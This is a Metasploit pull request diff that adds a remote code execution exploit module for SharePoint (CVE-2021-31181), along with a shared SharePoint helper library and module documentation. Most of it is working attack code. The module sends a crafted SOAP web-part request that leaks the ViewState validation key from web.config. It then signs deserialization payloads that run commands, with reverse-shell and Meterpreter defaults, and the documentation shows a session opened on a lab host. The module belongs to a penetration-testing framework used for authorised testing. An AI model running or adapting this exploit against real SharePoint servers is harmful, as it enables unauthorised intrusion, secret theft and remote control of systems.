### PR TITLE
Add Exploit For CVE-2021-31181 (SharePoint RCE)

### DIFF
--- a/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
@@ -26,15 +26,15 @@ Follow [Setup](#setup) and [Scenarios](#scenarios).
 
 ## Targets
 
-### 0
+### Windows Command
 
 This executes a Windows command.
 
-### 1
+### Windows Dropper
 
 This uses a Windows dropper to execute code.
 
-### 2
+### PowerShell Stager
 
 This uses a PowerShell stager to execute code.
 

--- a/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
@@ -55,6 +55,11 @@ Set this to the ViewState validation key if you have it.
 
 Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.
 
+### SP_LIST
+
+Set this to the title of any valid SPlist on the targeted SharePoint site. The `Documents` SPlist is typically a safe
+option.
+
 ## Scenarios
 
 ### SharePoint 2019 on Windows Server 2016

--- a/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
@@ -10,6 +10,8 @@ The check method is unauthenticated and will determine whether or not the target
 number. The exploit however requires authentication in order to trigger the vulnerability. See the documentation for the
 [HttpUsername](#httpusername) option below for details on the account.
 
+This vulnerability was patched in May of 2021.
+
 Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.
 
 ### Setup
@@ -58,7 +60,7 @@ Set this to a SharePoint cookie if you have one. This is primarily useful for fo
 ### SP_LIST
 
 Set this to the title of any valid SPlist on the targeted SharePoint site. The `Documents` SPlist is typically a safe
-option.
+option. The available SPlist items can be seen listed on the `/_layouts/15/viewlsts.aspx` page.
 
 ## Scenarios
 

--- a/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
+++ b/documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
@@ -1,0 +1,95 @@
+## Vulnerable Application
+
+### Description
+
+The `EditingPageParser.VerifyControlOnSafeList` method fails to properly validate user supplied data. This can be
+leveraged by an attacker to leak sensitive information in rendered-preview content. This module will leak the ViewState
+validation key and then use it to sign a crafted object that will trigger code execution when deserialized.
+
+The check method is unauthenticated and will determine whether or not the target service is vulnerable via the version
+number. The exploit however requires authentication in order to trigger the vulnerability. See the documentation for the
+[HttpUsername](#httpusername) option below for details on the account.
+
+Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.
+
+### Setup
+
+Follow [Microsoft's
+documentation](https://docs.microsoft.com/en-us/sharepoint/install/install-sharepoint-server-2016-on-one-server).
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### Windows Command
+
+This executes a Windows command.
+
+### Windows Dropper
+
+This uses a Windows dropper to execute code.
+
+### PowerShell Stager
+
+This uses a PowerShell stager to execute code.
+
+## Options
+
+### HttpUsername
+
+Set this to the SharePoint username. This user must have the `SPBasePermissions.ManageLists` permission on the targeted
+SharePoint site. By default, SharePoint users may create their own site where they will have this permissions however
+this action **is not automatically performed** by this module.
+
+### HttpPassword
+
+Set this to the SharePoint password.
+
+### VALIDATION_KEY
+
+Set this to the ViewState validation key if you have it.
+
+### COOKIE
+
+Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.
+
+## Scenarios
+
+### SharePoint 2019 on Windows Server 2016
+
+```
+msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
+RHOSTS => 192.168.159.46
+msf6 exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
+VHOST => shrpnt2019
+msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
+HttpUsername => aliddle
+msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
+HttpPassword => Password1
+msf6 exploit(windows/http/sharepoint_unsafe_control) > check
+[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
+msf6 exploit(windows/http/sharepoint_unsafe_control) > exploit
+
+[*] Started HTTPS reverse handler on https://192.168.159.128:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
+[*] Leaking the ViewState validation key...
+[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
+[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
+[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
+[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400
+
+meterpreter > getuid
+Server username: SHRPNT\SharePoint
+meterpreter > sysinfo
+Computer        : SHRPNT2019
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : SHRPNT
+Logged On Users : 11
+Meterpreter     : x64/windows
+meterpreter > 
+```

--- a/lib/msf/core/exploit/remote/http/sharepoint.rb
+++ b/lib/msf/core/exploit/remote/http/sharepoint.rb
@@ -58,7 +58,7 @@ module Msf
               'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
             }))
 
-            return nil unless res
+            return nil unless res&.code == 200
 
             res.get_xml_document.at('//d:Id')&.text
           end
@@ -75,7 +75,7 @@ module Msf
               'uri' => normalize_uri(target_uri.path)
             }))
 
-            return nil unless /^(?<build>[\d.]+):/ =~ res&.headers['MicrosoftSharePointTeamServices']
+            return nil unless /^(?<build>[\d.]+)/ =~ res&.headers['MicrosoftSharePointTeamServices']
 
             Rex::Version.new(build)
           end

--- a/lib/msf/core/exploit/remote/http/sharepoint.rb
+++ b/lib/msf/core/exploit/remote/http/sharepoint.rb
@@ -10,10 +10,21 @@ module Msf
           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::ViewState
 
+          # Execute an operating system command by crafting and sending a viewstate to the remote server. In order for
+          # this to work, the *validation_key* must be known.
+          #
+          # @param [String] cmd The OS command to run on the remote system
+          # @param [String] validation_key The remote system's validation key from the web.config file.
+          # @param [Hash] http_request_opts Options to override the defaults of the HTTP request.
+          #
+          # @raise [RuntimeError] This function will raise a RuntimeError via #fail_with if the command failed to
+          #   execute.
+          #
+          # @return [nil] This function doesn't return anything.
           def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
             vprint_status("Executing command: #{cmd}")
 
-            res = send_request_cgi({
+            res = send_request_cgi(http_request_opts.merge({
               'method' => 'POST',
               'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
               'vars_post' => {
@@ -24,7 +35,7 @@ module Msf
                   key: pack_viewstate_validation_key(validation_key)
                 )
               }
-            }.merge(http_request_opts))
+            }))
 
             unless res
               fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
@@ -37,22 +48,32 @@ module Msf
             vprint_good('Successfully executed command')
           end
 
+          # Get the site's webID.
+          #
+          # @param [Hash] http_request_opts Options to override the defaults of the HTTP request.
+          # @return [String, nil] The webID if it was able to be recovered.
           def sharepoint_get_site_web_id(http_request_opts = {})
-            res = send_request_cgi({
+            res = send_request_cgi(http_request_opts.merge({
               'method' => 'GET',
               'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
-            }.merge(http_request_opts))
+            }))
 
             return nil unless res
 
             res.get_xml_document.at('//d:Id')&.text
           end
 
+          # Get the SharePoint version number.
+          #
+          # @see https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates SharePoint Version Numbers
+          #
+          # @param [Hash] http_request_opts Options to override the defaults of the HTTP request.
+          # @return [Rex::Version, nil] The SharePoint version if it was able to be recovered.
           def sharepoint_get_version(http_request_opts = {})
-            res = send_request_cgi({
+            res = send_request_cgi(http_request_opts.merge({
               'method' => 'GET',
               'uri' => normalize_uri(target_uri.path)
-            }.merge(http_request_opts))
+            }))
 
             return nil unless /^(?<build>[\d.]+):/ =~ res&.headers['MicrosoftSharePointTeamServices']
 

--- a/lib/msf/core/exploit/remote/http/sharepoint.rb
+++ b/lib/msf/core/exploit/remote/http/sharepoint.rb
@@ -1,0 +1,66 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with sharepoint installations
+        module Sharepoint
+
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::ViewState
+
+          def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
+            vprint_status("Executing command: #{cmd}")
+
+            res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+              'vars_post' => {
+                '__VIEWSTATE' => generate_viewstate_payload(
+                  cmd,
+                  extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
+                  algo: 'sha256',
+                  key: pack_viewstate_validation_key(validation_key)
+                )
+              }
+            }.merge(http_request_opts))
+
+            unless res
+              fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+            end
+
+            unless res.code == 200
+              fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+            end
+
+            vprint_good('Successfully executed command')
+          end
+
+          def sharepoint_get_site_web_id(http_request_opts = {})
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path, '_api', 'web', 'id')
+            }.merge(http_request_opts))
+
+            return nil unless res
+
+            res.get_xml_document.at('//d:Id')&.text
+          end
+
+          def sharepoint_get_version(http_request_opts = {})
+            res = send_request_cgi({
+              'method' => 'GET',
+              'uri' => normalize_uri(target_uri.path)
+            }.merge(http_request_opts))
+
+            return nil unless /^(?<build>[\d.]+):/ =~ res&.headers['MicrosoftSharePointTeamServices']
+
+            Rex::Version.new(build)
+          end
+
+        end
+      end
+    end
+  end
+end

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::ViewState
+  include Msf::Exploit::Remote::HTTP::Sharepoint
   include Msf::Exploit::CmdStager
   include Msf::Exploit::Powershell
 
@@ -129,21 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    res = send_request_cgi(
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path),
-      'cookie' => cookie
-    )
+    build = sharepoint_get_version('cookie' => cookie)
 
-    unless res
-      return CheckCode::Unknown('Target did not respond to check.')
-    end
-
-    # Hat tip @tsellers-r7
-    #
-    # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
-    unless /^(?<build>[\d.]+):/ =~ res.headers['MicrosoftSharePointTeamServices']
-      return CheckCode::Unknown('Target does not appear to be running SharePoint.')
+    if build.nil?
+      return CheckCode::Unknown('Failed to retrieve the SharePoint version number')
     end
 
     if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
@@ -266,31 +255,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    vprint_status("Executing command: #{cmd}")
-
-    res = send_request_cgi(
-      'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
-      'cookie' => cookie,
-      'vars_post' => {
-        '__VIEWSTATE' => generate_viewstate_payload(
-          cmd,
-          extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
-          algo: 'sha256',
-          key: pack_viewstate_validation_key(@validation_key)
-        )
-      }
-    )
-
-    unless res
-      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
-    end
-
-    unless res.code == 200
-      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
-    end
-
-    vprint_good('Successfully executed command')
+    sharepoint_execute_command_via_viewstate(cmd, @validation_key, { 'cookie' => cookie })
   end
 
   def ssi_page

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -143,8 +143,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless username && password
-      fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')
+    if (username.blank? && password.blank?)
+      if cookie.blank?
+        fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword or COOKIE are required for exploitation')
+      end
+
+      print_warning('Using the specified COOKIE for authentication')
     end
 
     if (@validation_key = datastore['VALIDATION_KEY'])

--- a/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
+++ b/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb
@@ -135,7 +135,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Failed to retrieve the SharePoint version number')
     end
 
-    if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
+    if vuln_builds.any? { |build_range| build.between?(*build_range) }
       return CheckCode::Appears("SharePoint #{build} is a vulnerable build.")
     end
 

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -145,8 +145,12 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    unless username && password
-      fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')
+    if (username.blank? && password.blank?)
+      if cookie.blank?
+        fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword or COOKIE are required for exploitation')
+      end
+
+      print_warning('Using the specified COOKIE for authentication')
     end
 
     if (@validation_key = datastore['VALIDATION_KEY'])

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -1,0 +1,275 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::ViewState
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  XML_NS = {
+    'wpp' => 'http://microsoft.com/sharepoint/webpartpages',
+    'soap' => 'http://www.w3.org/2003/05/soap-envelope',
+    'xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
+    'xsd' => 'http://www.w3.org/2001/XMLSchema'
+  }.freeze
+
+  # TODO: write all the module meta data
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Microsoft SharePoint ...',
+        'Description' => %q{
+          Tested against SharePoint 2019 on Windows Server 2016.
+        },
+        'Author' => [
+          'Spencer McIntyre', # Module
+          'wvu' # Module
+        ],
+        'References' => [
+
+        ],
+        'DisclosureDate' => '', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => 'win',
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Windows Command',
+            {
+              'Arch' => ARCH_CMD,
+              'Type' => :win_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :win_dropper,
+              'DefaultOptions' => {
+                'CMDSTAGER::FLAVOR' => :psh_invokewebrequest,
+                'PAYLOAD' => 'windows/x64/meterpreter_reverse_https'
+              }
+            }
+          ],
+          [
+            'PowerShell Stager',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :psh_stager,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_https'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 2,
+        'DefaultOptions' => {
+          'DotNetGadgetChain' => :TypeConfuseDelegate
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time
+          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('VALIDATION_KEY', [false, 'ViewState validation key']),
+      OptString.new('COOKIE', [false, 'SharePoint cookie if you have one']),
+      # "Promote" these advanced options so we don't have to pass around our own
+      OptString.new('HttpUsername', [false, 'SharePoint username']),
+      OptString.new('HttpPassword', [false, 'SharePoint password'])
+    ])
+  end
+
+  def post_auth?
+    true
+  end
+
+  def username
+    datastore['HttpUsername']
+  end
+
+  def password
+    datastore['HttpPassword']
+  end
+
+  def cookie
+    datastore['COOKIE']
+  end
+
+  def vuln_builds
+    # TODO: update these build numbers
+    # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
+    # https://buildnumbers.wordpress.com/sharepoint/
+    [
+      [Rex::Version.new('15.0.0.4571'), Rex::Version.new('15.0.0.5275')], # SharePoint 2013
+      [Rex::Version.new('16.0.0.4351'), Rex::Version.new('16.0.0.5056')], # SharePoint 2016
+      [Rex::Version.new('16.0.0.10337'), Rex::Version.new('16.0.0.10366')] # SharePoint 2019
+    ]
+  end
+
+  def check
+    # TODO: write this check method
+    return CheckCode::Vulnerable('hack the planet')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path),
+      'cookie' => cookie
+    )
+
+    unless res
+      return CheckCode::Unknown('Target did not respond to check.')
+    end
+
+    # Hat tip @tsellers-r7
+    #
+    # MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
+    unless /^(?<build>[\d.]+):/ =~ res.headers['MicrosoftSharePointTeamServices']
+      return CheckCode::Unknown('Target does not appear to be running SharePoint.')
+    end
+
+    if vuln_builds.any? { |build_range| Rex::Version.new(build).between?(*build_range) }
+      return CheckCode::Appears("SharePoint #{build} is a vulnerable build.")
+    end
+
+    CheckCode::Safe("SharePoint #{build} is not a vulnerable build.")
+  end
+
+  def exploit
+    unless username && password
+      fail_with(Failure::BadConfig, 'HttpUsername and HttpPassword are required for exploitation')
+    end
+
+    if (@validation_key = datastore['VALIDATION_KEY'])
+      print_status("Using ViewState validation key #{@validation_key}")
+    else
+      leak_web_config
+    end
+
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :win_cmd
+      execute_command(payload.encoded)
+    when :win_dropper
+      execute_cmdstager
+    when :psh_stager
+      execute_command(cmd_psh_payload(
+        payload.encoded,
+        payload.arch.first,
+        remove_comspec: true
+      ))
+    end
+  end
+
+  def leak_web_config
+    print_status('Leaking the ViewState validation key...')
+
+    # TODO: make these dynamic
+    sp_list = 'Documents'
+    web_id = 'f52d2033-c11f-4aa5-af7d-5d5284a2cbad'
+
+    webpart = <<~WEBPART
+      <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>#{' '}
+      <%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
+    WEBPART
+    webpart << Nokogiri::XML(<<-WEBPART, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="#{sp_list.encode(xml: :text)}" WebId="{#{web_id.encode(xml: :text)}}">#{' '}
+        <DataSources>#{' '}
+          <att:xmldatasource runat="server" id="XDS1"#{' '}
+            XPath="/configuration/system.web/machineKey"#{' '}
+            datafile="c:/inetpub/wwwroot/wss/VirtualDirectories/80/web.config" />#{' '}
+        </DataSources>#{' '}
+        <xsl>#{' '}
+            <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">#{'          '}
+                <xsl:output method="xml" indent="yes"/>#{' '}
+                <xsl:template match="/" >#{' '}
+                <xsl:copy-of select="."/>#{' '}
+                </xsl:template>#{' '}
+            </xsl:stylesheet>#{' '}
+        </xsl>#{' '}
+      </WebPartPages:XsltListFormWebPart>
+    WEBPART
+
+    envelope = '<?xml version="1.0" encoding="utf-8"?>'
+    envelope << Nokogiri::XML(<<-ENVELOPE, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
+      <soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
+        <soap12:Body>
+          <RenderWebPartForEdit xmlns="http://microsoft.com/sharepoint/webpartpages">
+            <webPartXml>#{webpart.encode(xml: :text)}</webPartXml>
+          </RenderWebPartForEdit>
+        </soap12:Body>
+      </soap12:Envelope>
+    ENVELOPE
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx'),
+      'cookie' => cookie,
+      'ctype' => 'application/soap+xml; charset=utf-8',
+      'data' => envelope
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 200
+      fail_with(Failure::NotFound, "Failed to retrieve #{normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx')}")
+    end
+
+    xml_result = Nokogiri::XML(res.get_xml_document.xpath('//wpp:RenderWebPartForEditResult', XML_NS).text)
+    web_part_pages = Nokogiri::XML(xml_result.xpath('//Properties').text)
+    preview = Nokogiri::HTML(CGI.unescapeHTML(web_part_pages.root.attr('__designer:Preview')))
+
+    unless (@validation_key = preview.at('//machinekey/@validationkey')&.text)
+      fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')
+    end
+
+    print_good("ViewState validation key: #{@validation_key}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/_layouts/15/zoombldr.aspx'),
+      'cookie' => cookie,
+      'vars_post' => {
+        '__VIEWSTATE' => generate_viewstate_payload(
+          cmd,
+          extra: pack_viewstate_generator('63E6434F'), # /_layouts/15/zoombldr.aspx
+          algo: 'sha256',
+          key: pack_viewstate_validation_key(@validation_key)
+        )
+      }
+    )
+
+    unless res
+      fail_with(Failure::Unreachable, "Target did not respond to #{__method__}")
+    end
+
+    unless res.code == 200
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+
+    vprint_good('Successfully executed command')
+  end
+end

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Microsoft SharePoint ...',
+        'Name' => 'Microsoft SharePoint Unsafe Control and ViewState RCE',
         'Description' => %q{
-          The EditingPageParser.VerifyControlOnSafeList method has fails to properly validate user supplied data. This
+          The EditingPageParser.VerifyControlOnSafeList method fails to properly validate user supplied data. This
           can be leveraged by an attacker to leak sensitive information in rendered-preview content. This module will
           leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution
           when deserialized.
@@ -86,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],
-          'Reliability' => [UNRELIABLE_SESSION], # SSI may fail the second time
-          'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK]
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
         }
       )
     )
@@ -120,9 +120,9 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vuln_builds
-    # TODO: update the starting / lower build numbers
     # https://docs.microsoft.com/en-us/officeupdates/sharepoint-updates
     # https://buildnumbers.wordpress.com/sharepoint/
+    # Patched in May of 2021
     [
       [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.0.5337')], # SharePoint 2013
       [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.0.5149')], # SharePoint 2016

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -40,9 +40,10 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'References' => [
           [ 'CVE', '2021-31181' ],
+          [ 'ZDI', '21-573' ],
           [ 'URL', 'https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability' ]
         ],
-        'DisclosureDate' => '2021-06-02', # Public disclosure via the ZDI blog (see the references)
+        'DisclosureDate' => '2021-05-11',
         'License' => MSF_LICENSE,
         'Platform' => 'win',
         'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
@@ -230,14 +231,28 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, "Failed to retrieve #{normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx')}")
     end
 
-    xml_result = Nokogiri::XML(res.get_xml_document.xpath('//wpp:RenderWebPartForEditResult', XML_NS).text)
-    web_part_pages = Nokogiri::XML(xml_result.xpath('//Properties').text)
-    fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key') if web_part_pages.root.nil?
+    xml_response = res.get_xml_document
+    if xml_response.nil?
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key (non-XML response body)')
+    end
 
-    fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key') unless (preview = web_part_pages.root.attr('__designer:Preview'))
+    xml_result = xml_response.xpath('//wpp:RenderWebPartForEditResult', XML_NS)&.text
+    unless xml_result
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key (missing xpath: //wpp:RenderWebPartForEditResult)')
+    end
+
+    xml_result = Nokogiri::XML(xml_result)
+    web_part_pages = Nokogiri::XML(xml_result.xpath('//Properties').text)
+    unless web_part_pages&.root
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key (missing xpath: //Properties)')
+    end
+
+    unless (preview = web_part_pages.root.attr('__designer:Preview'))
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key (missing attribute: __desiginer:Preview)')
+    end
     preview = Nokogiri::HTML(CGI.unescapeHTML(preview))
     unless (@validation_key = preview.at('//machinekey/@validationkey')&.text)
-      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key')
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key (missing xpath: //machinekey/@validationkey)')
     end
 
     print_good("ViewState validation key: #{@validation_key}")

--- a/modules/exploits/windows/http/sharepoint_unsafe_control.rb
+++ b/modules/exploits/windows/http/sharepoint_unsafe_control.rb
@@ -31,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Remote
           leak the ViewState validation key and then use it to sign a crafted object that will trigger code execution
           when deserialized.
 
-          Tested against SharePoint 2019 on Windows Server 2016.
+          Tested against SharePoint 2019 and SharePoint 2016, both on Windows Server 2016.
         },
         'Author' => [
           'Unknown', # Reported to HP ZDI team, Vulnerability discovery
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     webpart = <<~WEBPART
       <%@ Register TagPrefix="WebPartPages" Namespace="Microsoft.SharePoint.WebPartPage" Assembly="Microsoft.SharePoint, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
-      <%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"%>
+      <%@ Register TagPrefix="att" Namespace="System.Web.UI.WebControls " Assembly="System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" %>
     WEBPART
     webpart << Nokogiri::XML(<<-WEBPART, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)
       <WebPartPages:XsltListFormWebPart id="id01" runat="server" ListDisplayName="#{datastore['SP_LIST'].encode(xml: :text)}" WebId="{#{web_id.encode(xml: :text)}}">
@@ -190,9 +190,9 @@ class MetasploitModule < Msf::Exploit::Remote
         </DataSources>
         <xsl>
             <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
-                <xsl:output method="xml" indent="yes"/>
-                <xsl:template match="/" >
-                    <xsl:copy-of select="."/>
+                <xsl:output method="xml" indent="yes" />
+                <xsl:template match="/">
+                    <xsl:copy-of select="." />
                 </xsl:template>
             </xsl:stylesheet>
         </xsl>
@@ -228,10 +228,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     xml_result = Nokogiri::XML(res.get_xml_document.xpath('//wpp:RenderWebPartForEditResult', XML_NS).text)
     web_part_pages = Nokogiri::XML(xml_result.xpath('//Properties').text)
-    preview = Nokogiri::HTML(CGI.unescapeHTML(web_part_pages.root.attr('__designer:Preview')))
+    fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key') if web_part_pages.root.nil?
 
+    fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key') unless (preview = web_part_pages.root.attr('__designer:Preview'))
+    preview = Nokogiri::HTML(CGI.unescapeHTML(preview))
     unless (@validation_key = preview.at('//machinekey/@validationkey')&.text)
-      fail_with(Failure::NotFound, 'Failed to extract ViewState validation key')
+      fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key')
     end
 
